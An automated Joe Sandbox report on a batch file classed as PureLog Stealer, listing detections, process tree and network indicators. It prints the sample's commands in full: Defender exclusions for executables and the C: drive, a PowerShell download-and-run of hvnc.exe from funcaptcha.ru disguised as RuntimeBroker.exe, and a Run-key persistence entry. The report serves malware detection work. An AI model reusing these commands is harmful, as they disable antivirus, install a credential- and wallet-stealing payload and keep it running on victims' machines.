Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
temp_script.bat

Overview

General Information

Sample name:temp_script.bat
Analysis ID:1488895
MD5:7972cb9d1ef5a286c735bb8da928fbda
SHA1:98e294e14777cc9e5a3c7166b35b2feba3b3f140
SHA256:649dd265b8599866e827d12135b10b2b415d221ca4db58e1cf8c602c6afa2466
Tags:batfuncaptcha-ru
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Yara detected Powershell download and execute
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cacls.exe (PID: 3136 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)
    • powershell.exe (PID: 1672 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3868 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5692 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7064 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1812 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2284 cmdline: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • RuntimeBroker.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" MD5: 7557AF6F3185128C25AEB092DC335975)
      • powershell.exe (PID: 2200 cmdline: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
temp_script.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.RuntimeBroker.exe.1c600000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        11.2.RuntimeBroker.exe.1c600000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_2284.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2284, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Sigma detected: PowerShell DownloadFile
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , ProcessId: 5676, ProcessName: RuntimeBroker.exe
            Sigma detected: Windows Binaries Write Suspicious Extensions
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ProcessId: 5676, TargetFilename: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
            Sigma detected: PowerShell Download Pattern
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Set autostart key via New-ItemProperty Cmdlet
            Source: Process startedAuthor: Joe Security: Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentProcessId: 5676, ParentProcessName: RuntimeBroker.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', ProcessId: 2200, ProcessName: powershell.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://funcaptcha.ru/hvnc.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeReversingLabs: Detection: 65%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: global trafficTCP traffic: 192.168.2.5:49705 -> 45.11.229.96:56001
            Source: global trafficHTTP traffic detected: GET /hvnc.exe HTTP/1.1Host: funcaptcha.ruConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /hvnc.exe HTTP/1.1Host: funcaptcha.ruConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: funcaptcha.ru
            Source: global trafficDNS traffic detected: DNS query: strompreis.ru
            Source: powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: temp_script.batString found in binary or memory: https://funcaptcha.ru/hvnc.exe
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
            Source: powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1CF2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2

            System Summary

            barindex
            .NET source code contains very large array initializations
            Source: RuntimeBroker.exe.10.dr, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Source: RuntimeBroker.exe.11.dr, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Source: 11.2.RuntimeBroker.exe.12ae1a78.1.raw.unpack, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\WinEmptyfoldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F1102A11_2_00007FF848F1102A
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F1135111_2_00007FF848F11351
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F10FE211_2_00007FF848F10FE2
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe 5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\RuntimeBroker.exe 5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
            Source: RuntimeBroker.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: RuntimeBroker.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@21/28@2/2
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\98216E3219
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3levjhjt.jrq.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cacls.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
